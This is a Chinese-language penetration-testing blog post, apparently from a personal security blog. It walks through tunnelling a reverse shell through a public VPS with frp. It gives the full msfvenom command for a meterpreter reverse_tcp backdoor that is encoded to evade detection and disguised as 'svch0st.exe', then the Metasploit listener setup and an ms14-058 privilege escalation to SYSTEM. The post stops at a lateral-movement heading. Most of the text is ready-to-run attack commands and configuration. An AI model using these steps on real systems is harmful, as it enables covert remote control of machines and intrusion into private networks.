PenTest Vol.7 - 内网 | 内网渗透部分

  • Naykcin
  • 9 Minutes
  • November 22, 2019

PenTest Vol.7 - 内网 | 内网渗透部分 [持续更新]

💡 通常都是在内网环境中利用 msfvenom 制作后门并测试,但是真实环境中不能设置 Kali 内网 IP 来使目标系统 reverse 连接,这时就需要利用 vps 做一个端口转发,在这里记录一下姿势。

📍 首先说思路:

// Target 内网
Windows XP 192.168.0.205

// 公网 vps
ubuntu 1.1.1.1

// Hacker
Kali 192.168.0.105

公网 vps 运行 frp server,Kali 运行 frp client,将 Kali 本地的端口映射至 vps。

  1. 下载 frp

    https://github.com/fatedier/frp/releases
  2. 首先配置公网 vps frp 服务端:

    // ./frps.ini

    [common]
    bind_port = 6767 // 与 Kali 转发的端口

    然后启动服务端:

    ./frps -c ./frps.ini
  3. 接着配置客户端(Kali):

    // ./frpc.ini

    [common]
    server_addr = vps 地址
    server_port = 6767 // 与 Kali 转发的端口

    [msf]
    type = tcp
    local_ip = 127.0.0.1
    local_port = 1234 // 弹回 Kali 本地的端口
    remote_port = 16200 // taget reverse 连接 vps 的端口,和生成后门的端口一致

    然后启动客户端:

    ./frpc -c ./frpc.ini
  4. 生成后门

    $ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=vpsIP LPORT=16200 -b"\x00" -e x86/shikata_ga_nai -f exe > /root/svch0st.exe

    然后开启 msfconsole 监听本地端口:

    msf5> use exploit/multi/handler
    msf5> set lhost 127.0.0.1
    msf5> set lport 1234
    msf5> exploit
  5. 然后即可弹回 shell。

    屏幕快照 2019-12-31 上午12.54.27

    接着查看用户权限,尝试提权失败,获取系统信息看是否有可以利用的内核漏洞来提权:

    meterpreter> getuid
    meterpreter> getsystem

    搜索后发现目标主机可能存在 ms14-058 提权漏洞,这里要注意利用 frp 再映射一个端口,建立新的文件夹,生成新的服务端和客户端配置文件,再次监听、映射端口,然后建立一个新的 msfconsole,监听本地另外一个端口,弹回一个高权限的 shell:

    // msfconsole 1 执行
    msf5> use exploit/windows/local/ms14_058_track_popup_menu
    msf5> set lhost vpsIP
    msf5> set lport 12345
    msf5> exploit

    // msfconsole 2 执行
    msf5> use exploit/multi/handler
    msf5> set lhost 127.0.0.1
    msf5> set lport 1235
    msf5> exploit

    屏幕快照 2019-12-31 上午2.05.05

至此已经获取了内网的 system 权限,接下来的思路是进行本地信息收集,进行内网横向移动。

📍 横向移动部分

⚙️ 本地信息收集